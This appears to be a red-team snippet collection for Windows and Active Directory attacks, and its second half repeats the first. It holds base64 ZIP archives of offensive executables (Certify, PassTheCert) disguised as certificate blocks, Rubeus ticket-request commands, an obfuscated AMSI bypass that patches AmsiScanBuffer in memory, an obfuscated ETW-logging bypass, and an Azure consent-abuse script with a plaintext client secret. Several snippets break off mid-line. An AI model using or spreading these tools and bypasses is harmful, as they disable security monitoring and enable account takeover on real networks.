m8r1us

## Certify-interop
-----BEGIN CERTIFICATE-----
UEsDBDMAAQBjAIIwDFkAAAAAUwIBAAAOAwAZAAsASW50ZXJvcC5DRVJURU5ST0xM
TGliLmRsbAGZBwACAEFFAwgAZkFCapRrjSmNUx59awCtbx9+xJXFhGPIyW2yaCmw
sQSdmuBIz0U10jMnnxCaDrt838zXfLt6Z8k+DEyxSwbbtwnCioTRH/ZYqhmRA3lb
WySQYlEtjD/YtSVQp5MjXLArDntgZwkZG3s47o7POTomC3wFLq6f9rnosH7M/Lxe
hx2WVrSha09p01ST7ydN7ir4u2wpA5ux6bc2/5/EpL1+CSedHXcPdF6FMx67+I7+
3+n7PaJt8Sgz06618ASD5NhJmva/ls5anofCxL4RwXDvAG3/iB89bk+CF7s0jK2M
hJas1EGXQ00uUf/Xgo+OByupJCykm4yQYKOYyhkhn3Q0+Cz823yusav6W1/fft31
2xzv//FXZudZNztjbExRu6QSDPyj7tXD5Ht0Jex1MwtrE1wAGvIpZtU6iP1bN3XS
Kig0NzTWI2CTwSL7HGz5pfhU5SC53rJ+41kxSQ+2asqaRPazRsjDPdvRmf+jytwP

## Certify
-----BEGIN CERTIFICATE-----
UEsDBDMAAQBjADt9i1kAAAAAH48AAACCAQALAAsAQ2VydGlmeS5leGUBmQcAAgBB
RQMIAC3CRaERpQ21tgROICpFitUZHRxFVlwOvuRJe4ZGbHN8sHkIsD+lX4i4ZhqN
4Xahl3dBR+ABfmebAn9W/nK1M4R0loBioNdmCzuflgPwlwNKyeD1XtjnHIWhk57r
c3sZzf/VLiczxNYnt6i7DChPUDOoxfI81e1xiIrRc57kvVDzgipBBIPnz2hWrkDU
7KPdSFbvoIXSZF7kMqKOi0v08w5m9tfUI24BxCBwnb0iy+2QLCEuv8nSn0L2v4/C
+n3FWNp433g3JMY6JeF9Xo0ncYNpDZknxtic9xrOeFK0srwq63+1kp7bm3zjA6YQ
QbaNphkBelhhMtjFqwrEws1SXZ0k6Z3LQMSsH7Mc9jZg1HWN6qnnTKwQM6Jp7W60
1bEZnGqR4rNhyJHlqSDaRlLPyLidETnECO/j9m2MIVwvQ2mT0HM2AJlw63s36Wln
FeM3zR3VoC3TYpvboZ2UeKF42q5fI5y96Uv3pC2C2229oGtWzRDTu4rea5eVSeYQ

## passthecert
-----BEGIN CERTIFICATE-----
UEsDBDMAAQBjAE9/ilkAAAAAbS8AAAB6AAAPAAsAUGFzc1RoZUNlcnQuZXhlAZkH
AAIAQUUDCACesl4pid56vnjfgDFU+Lx4jCIpjuO8vb/AJcB58pqMJPus2W1qMa3N
BK5m2DauasClpiEvTZ0kd3PkY/ocVaGKDFaX69Qmmhc7WRlekt0n5pY2EV3ReEwb
RIBvP0f2snJCc2tSO7ePIpcsgsGdKnxpIEbQqsEKA4ZxWIL4TiJ1/iBCgnldTx0v
SqcWi0pCb3wZeYo1VpY3CwXXdBhX7Jm/YND3dXIXX8euI5Wxls7vZ+tHWyH7mSWA
THZAyvaKVbKJq8E0omY2KpA3rc6jgO3SfhQQzgvEGZXbvIyM2sZ6KnnAFXsBPucS
Kx2QyLvAWFJ/wmKBJfJGE2F7QW9ZTAE+YtkZPbkSqGvfcpiwKQ/4uUvsT+v3Qlhl
QhNVf5Tvr09+n2eJcrh/gE4m+GCce80aLWXgHiYPbe5p2mK+IyLUPwqykNCtXRAV
vPa35+G49EWTcYFJjlRN22BXOy7ySZSWFsrqYBOrOeGjcfSzLxWLbNPpgYo4aEkW

## rubeus
Rubeus.exe createnetonly /program:C:\Windows\System32\cmd.exe /domain:dev.cyberbotic.io /username:bfarmer /password:FakePass123 /dc:dc1.asd.ch /show

Rubeus.exe asktgt /getcredentials /password:"password_you_set" /user:user_you_impersonating /certificate:yourcert.pfx /domain:alexlab.local /dc:dc01 /show

## AMSI-test
$teststring = "AMSI Test Sample: " + "7e72c3ce-861b-4339-8740-0ac1484c1386"
Invoke-Expression $teststring

## AMSI
$data = @"
usi-ng Syst-em;usi-ng Syst-em.R-untime.Int-eropS-ervices;us-ing Syst-em.Thr-ead-ing;pub-lic c-lass Pr-ogram{-    [D-llIm-port("ker-ne-l3-2")]    pub-l-ic static e-x-tern IntPtr GetP-ro-cA-ddr-ess(IntPtr hMo-du-le, str-in-g proc-Na-me);    [D-llIm-port("ke-rne-l3-2")]    pub-l-ic static e-x-tern IntPtr Lo-ad-Li-brary(str-in-g na-me);    [D-llIm-port("ke-rn-el32")]    pub-l-ic static e-x-tern bo-ol V-irtualPr-ot-ect(IntPtr lpAd-dr-ess, U-In-t32 dw-S-ize, uint flN-ew-Pr-ot-ect, out uint lpflO-ld-Pr-ot-ect);	pub-lic stat-ic void Ru-n()	{		Int-Ptr li-b = Lo-a-dLi-b-rary("a"+"m"+"si."+"d"+"l"+"l");		IntPt-r am-s-i = GetPr-o-cAddr-e-ss(lib, "A"+"m"+"s"+"iSc"+"anB"+"u-ff-e-r");		In-tPtr fi-nal = IntPtr.Ad-d(a-m-si, 0x9-5);		uint old = 0;		Vi-r-t-ua-lPr-o-t-ec-t(fi-nal, (UIn-t3-2)0x1, 0x4-0, out old);		C-o-nso-l-e.Wr-i-teLi-n-e(old);		byt-e[] pat-ch = new by-te[] { 0x75 };		M-a-rsh-a-l.Co-p-y(pat-ch, 0, final, 1);		Vi-rt-ua-lPr-o-t-ec-t(fi-nal, (UIn-t32)0x1, o-ld, ou-t ol-d);	}}
"@
Add-Type $data.Replace('-

## ETW-bypass
[System.Diagnostics.Eventing.EventProvider]."G`etField"(-join([char[]](109,95,101,110,97,98,108,101,100)),-join([char[]](78,111,110,80,117,98,108,105,99,44,73,110,115,116,97,110,99,101)))."S`etValue"([Ref].Assembly."G`etType"(-join([char[]](83,121,115,116,101,109,46,77,97,110,97,103,101,109,101,110,116,46,65,117,116,111,109,97,116,105,111,110,46,84,114,97,99,105,110,103,46,80,83,69,116,119,76,111,103,80,114,111,118,105,100,101,114)))."G`etField"(-join([char[]](101,116,119,80,114,111,118,105,100,101,114)),-join([char[]](78,111,110,80,117,98,108,105,99,44,83,116,97,116,105,99)))."G`etValue"($null),0)

## gist:31ac5c8495015d9cdf7d41b2046fdb13
UEsDBBQAAAAIANVbIlDSrchvJ0wCAGihBwAYAAAATWFnbmV0UHJvY2Vzc0NhcHR1cmUuZXhl1Ft9YBzFdZ/bu9s73UmyTiff6fvWH5LXdydZ/pYMtmVjKMbf3w4G27J8NrIlrbwnYYyQLDDEYGwHKOTDUAJuSFJK0rSYQIFQU1ya0kBdmjrF2NSlhFBCG0ITmpJE6ntvZnfnPmTTlH+qoJ03v5n33m/ezLyZXTnLrr2HuRljHvgdGWHsGcZ/Wtmlf4bgtzj2bDE7UfDquGdcS18dt/aGjrTWYxo7zbYurb2tu9vo1balNLOvW+vo1hatWKN1GdtTjUVFgYnCxsorGVvqcrPCSPFmy+4FNp4FXSsZe9/L2JddhA37VMY0EDQokR3KCueNP1bJLvgI73rbB0XrHYyV0H9OaRf08wTYXYEC2L3lAZfTcLuP3VAD5UkfK4TiOuhXzf4XPxpjfqnqh/rVUr2xN3VTL5Se97x8LDhWhWX8ALy10Uyb7SATNxz7F6H8wJvRrxX+azRTnQZ0RK7ImWzd5svut5Bl/VzAuDLOTWFe9kjCy55/kzGMBMRUXbuOsSVn7Ohe8qdSB8dq/Fq9gbGA3ogPoKQqxhQQ45v1JiiUYRWcqumpIBvTED+rRPRmbIEmLza1oOIcRCL6ZVhE9ct5MZeD81DtKkUvht5GFB76fERqFb0Vy9fSC6AYglF40gtRwqWSvgIlN0qLUPKgdCVK4NMTbxzE7sZVqN84iArG73EZVYyruYxKxmIuo5pxDcqr3cMRGFOVsQFq7uGxKCOZjdg4S3Hrn8MBKYKim9RP44zrmsA8WG5TlH6YMw/2TAygxOvx+9xcaKx0J4PmzxnrSV8LCjcryi3UHywmwKJqWxxvkTAHN0H9MKzFqoYAekkMIUBo/OXBAtAu06+DSrLWbHGxntN+y4ZxPTzSmzE+2Iu6xisHA1jUKkNUDurjIfZmFyhSg7EFx4mD7S1A76L93jztsCxc8fvSOs7dVqGgDAVxTjZanYaKuDO9

## PassTheCert.cs
// Copyright 2022 Almond (almond.consulting)
//
// Author: Yannick Méheut (ymeheut@almond.consulting)
//
// Accompanying blog post: https://offsec.almond.consulting/authenticating-with-certificates-when-pkinit-is-not-supported.html
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//

## consentIsTheMindkiller.ps1
# The script is part of the following article: https://www.scip.ch/en/?labs.20240404

$myTenantId = "cdfdd915-c827-..." # The tenant registering the foreign application (Source: My Tenant)
$foreignTenantId = "d2a16643-37f9-4a19-..." # The tenant who is hosting the application (Source: Foreign Tenant)
$spPassword = "5YB8Q~iFPkt7WXYbqZkzi42BqpPgVJCWR-assd1" # The client secret from the app (Source: Foreign Tenant)
$appName = "foreignApp" # The app name (Source: Foreign Tenant)

# --------------
#Step 0 (Foreign Tenant): Create an application in the portal
# --------------
	-----BEGIN CERTIFICATE-----
	UEsDBDMAAQBjAIIwDFkAAAAAUwIBAAAOAwAZAAsASW50ZXJvcC5DRVJURU5ST0xM
	TGliLmRsbAGZBwACAEFFAwgAZkFCapRrjSmNUx59awCtbx9+xJXFhGPIyW2yaCmw
	sQSdmuBIz0U10jMnnxCaDrt838zXfLt6Z8k+DEyxSwbbtwnCioTRH/ZYqhmRA3lb
	WySQYlEtjD/YtSVQp5MjXLArDntgZwkZG3s47o7POTomC3wFLq6f9rnosH7M/Lxe
	hx2WVrSha09p01ST7ydN7ir4u2wpA5ux6bc2/5/EpL1+CSedHXcPdF6FMx67+I7+
	3+n7PaJt8Sgz06618ASD5NhJmva/ls5anofCxL4RwXDvAG3/iB89bk+CF7s0jK2M
	hJas1EGXQ00uUf/Xgo+OByupJCykm4yQYKOYyhkhn3Q0+Cz823yusav6W1/fft31
	2xzv//FXZudZNztjbExRu6QSDPyj7tXD5Ht0Jex1MwtrE1wAGvIpZtU6iP1bN3XS
	Kig0NzTWI2CTwSL7HGz5pfhU5SC53rJ+41kxSQ+2asqaRPazRsjDPdvRmf+jytwP
	-----BEGIN CERTIFICATE-----
	UEsDBDMAAQBjADt9i1kAAAAAH48AAACCAQALAAsAQ2VydGlmeS5leGUBmQcAAgBB
	RQMIAC3CRaERpQ21tgROICpFitUZHRxFVlwOvuRJe4ZGbHN8sHkIsD+lX4i4ZhqN
	4Xahl3dBR+ABfmebAn9W/nK1M4R0loBioNdmCzuflgPwlwNKyeD1XtjnHIWhk57r
	c3sZzf/VLiczxNYnt6i7DChPUDOoxfI81e1xiIrRc57kvVDzgipBBIPnz2hWrkDU
	7KPdSFbvoIXSZF7kMqKOi0v08w5m9tfUI24BxCBwnb0iy+2QLCEuv8nSn0L2v4/C
	+n3FWNp433g3JMY6JeF9Xo0ncYNpDZknxtic9xrOeFK0srwq63+1kp7bm3zjA6YQ
	QbaNphkBelhhMtjFqwrEws1SXZ0k6Z3LQMSsH7Mc9jZg1HWN6qnnTKwQM6Jp7W60
	1bEZnGqR4rNhyJHlqSDaRlLPyLidETnECO/j9m2MIVwvQ2mT0HM2AJlw63s36Wln
	FeM3zR3VoC3TYpvboZ2UeKF42q5fI5y96Uv3pC2C2229oGtWzRDTu4rea5eVSeYQ
	-----BEGIN CERTIFICATE-----
	UEsDBDMAAQBjAE9/ilkAAAAAbS8AAAB6AAAPAAsAUGFzc1RoZUNlcnQuZXhlAZkH
	AAIAQUUDCACesl4pid56vnjfgDFU+Lx4jCIpjuO8vb/AJcB58pqMJPus2W1qMa3N
	BK5m2DauasClpiEvTZ0kd3PkY/ocVaGKDFaX69Qmmhc7WRlekt0n5pY2EV3ReEwb
	RIBvP0f2snJCc2tSO7ePIpcsgsGdKnxpIEbQqsEKA4ZxWIL4TiJ1/iBCgnldTx0v
	SqcWi0pCb3wZeYo1VpY3CwXXdBhX7Jm/YND3dXIXX8euI5Wxls7vZ+tHWyH7mSWA
	THZAyvaKVbKJq8E0omY2KpA3rc6jgO3SfhQQzgvEGZXbvIyM2sZ6KnnAFXsBPucS
	Kx2QyLvAWFJ/wmKBJfJGE2F7QW9ZTAE+YtkZPbkSqGvfcpiwKQ/4uUvsT+v3Qlhl
	QhNVf5Tvr09+n2eJcrh/gE4m+GCce80aLWXgHiYPbe5p2mK+IyLUPwqykNCtXRAV
	vPa35+G49EWTcYFJjlRN22BXOy7ySZSWFsrqYBOrOeGjcfSzLxWLbNPpgYo4aEkW
	Rubeus.exe createnetonly /program:C:\Windows\System32\cmd.exe /domain:dev.cyberbotic.io /username:bfarmer /password:FakePass123 /dc:dc1.asd.ch /show

	Rubeus.exe asktgt /getcredentials /password:"password_you_set" /user:user_you_impersonating /certificate:yourcert.pfx /domain:alexlab.local /dc:dc01 /show
	$teststring = "AMSI Test Sample: " + "7e72c3ce-861b-4339-8740-0ac1484c1386"
	Invoke-Expression $teststring
	$data = @"
	usi-ng Syst-em;usi-ng Syst-em.R-untime.Int-eropS-ervices;us-ing Syst-em.Thr-ead-ing;pub-lic c-lass Pr-ogram{- [D-llIm-port("ker-ne-l3-2")] pub-l-ic static e-x-tern IntPtr GetP-ro-cA-ddr-ess(IntPtr hMo-du-le, str-in-g proc-Na-me); [D-llIm-port("ke-rne-l3-2")] pub-l-ic static e-x-tern IntPtr Lo-ad-Li-brary(str-in-g na-me); [D-llIm-port("ke-rn-el32")] pub-l-ic static e-x-tern bo-ol V-irtualPr-ot-ect(IntPtr lpAd-dr-ess, U-In-t32 dw-S-ize, uint flN-ew-Pr-ot-ect, out uint lpflO-ld-Pr-ot-ect); pub-lic stat-ic void Ru-n() { Int-Ptr li-b = Lo-a-dLi-b-rary("a"+"m"+"si."+"d"+"l"+"l"); IntPt-r am-s-i = GetPr-o-cAddr-e-ss(lib, "A"+"m"+"s"+"iSc"+"anB"+"u-ff-e-r"); In-tPtr fi-nal = IntPtr.Ad-d(a-m-si, 0x9-5); uint old = 0; Vi-r-t-ua-lPr-o-t-ec-t(fi-nal, (UIn-t3-2)0x1, 0x4-0, out old); C-o-nso-l-e.Wr-i-teLi-n-e(old); byt-e[] pat-ch = new by-te[] { 0x75 }; M-a-rsh-a-l.Co-p-y(pat-ch, 0, final, 1); Vi-rt-ua-lPr-o-t-ec-t(fi-nal, (UIn-t32)0x1, o-ld, ou-t ol-d); }}
	"@
	Add-Type $data.Replace('-
	// Copyright 2022 Almond (almond.consulting)
	//
	// Author: Yannick Méheut (ymeheut@almond.consulting)
	//
	// Accompanying blog post: https://offsec.almond.consulting/authenticating-with-certificates-when-pkinit-is-not-supported.html
	//
	// Licensed under the Apache License, Version 2.0 (the "License");
	// you may not use this file except in compliance with the License.
	// You may obtain a copy of the License at
	//
	# The script is part of the following article: https://www.scip.ch/en/?labs.20240404

	$myTenantId = "cdfdd915-c827-..." # The tenant registering the foreign application (Source: My Tenant)
	$foreignTenantId = "d2a16643-37f9-4a19-..." # The tenant who is hosting the application (Source: Foreign Tenant)
	$spPassword = "5YB8Q~iFPkt7WXYbqZkzi42BqpPgVJCWR-assd1" # The client secret from the app (Source: Foreign Tenant)
	$appName = "foreignApp" # The app name (Source: Foreign Tenant)

	# --------------
	#Step 0 (Foreign Tenant): Create an application in the portal
	# --------------